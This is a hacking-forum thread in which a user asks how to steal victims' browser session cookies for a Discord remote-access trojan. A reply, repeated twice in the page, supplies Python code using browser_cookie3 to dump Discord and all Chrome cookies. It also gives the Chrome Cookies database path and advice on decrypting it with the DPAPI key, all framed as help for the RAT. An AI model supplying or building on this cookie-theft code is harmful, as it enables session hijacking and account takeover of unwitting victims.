Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   479

Need help Cookies

by Machiaveli1 - 29 May, 2026 - 09:37 PM
This post is by a banned member (Machiaveli1) - Unhide
61
Posts
24
Threads
#1
Guys i am trying to make Discord RAT, i need to take cookies(session token) but all sites have different login cookie name, so i don't know how to take victims cookies, i need help, how should i take person's cookies for all websites that he used?
This post is by a banned member (GRIMDEAL) - Unhide
GRIMDEAL  
Premium Member
200
Posts
76
Threads
#2
(This post was last modified: 04 June, 2026 - 01:46 AM by GRIMDEAL.)
For Discord specifically you want the token, not all cookies.

Use browser_cookie3 lib in Python:

Code:
import browser_cookie3

# Get Discord cookies only
cookies = browser_cookie3.chrome(domain_name='discord.com')
for c in cookies:
    print(c.name, c.value[:20])

# Get ALL cookies from browser
all_cookies = browser_cookie3.chrome()
for c in all_cookies:
    print(c.domain, c.name, c.value[:20])

If you need it for a RAT, just grab the entire Cookies SQLite file from:
Code:
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies

Then decrypt with Chrome DPAPI key. Or use the sqlite3 + win32crypt modules to decrypt it directly.

For a simpler approach, use the browser_cookie3 GitHub — it handles decryption automatically.

For Discord specifically you want the token, not all cookies.

Use browser_cookie3 lib in Python:

Code:
import browser_cookie3

# Get Discord cookies only
cookies = browser_cookie3.chrome(domain_name='discord.com')
for c in cookies:
    print(c.name, c.value[:20])

# Get ALL cookies from browser
all_cookies = browser_cookie3.chrome()
for c in all_cookies:
    print(c.domain, c.name, c.value[:20])

If you need it for a RAT, just grab the entire Cookies SQLite file from:
Code:
%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Cookies

Then decrypt with Chrome DPAPI key. Or use the sqlite3 + win32crypt modules to decrypt it directly.

For a simpler approach, use the browser_cookie3 GitHub — it handles decryption automatically.

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)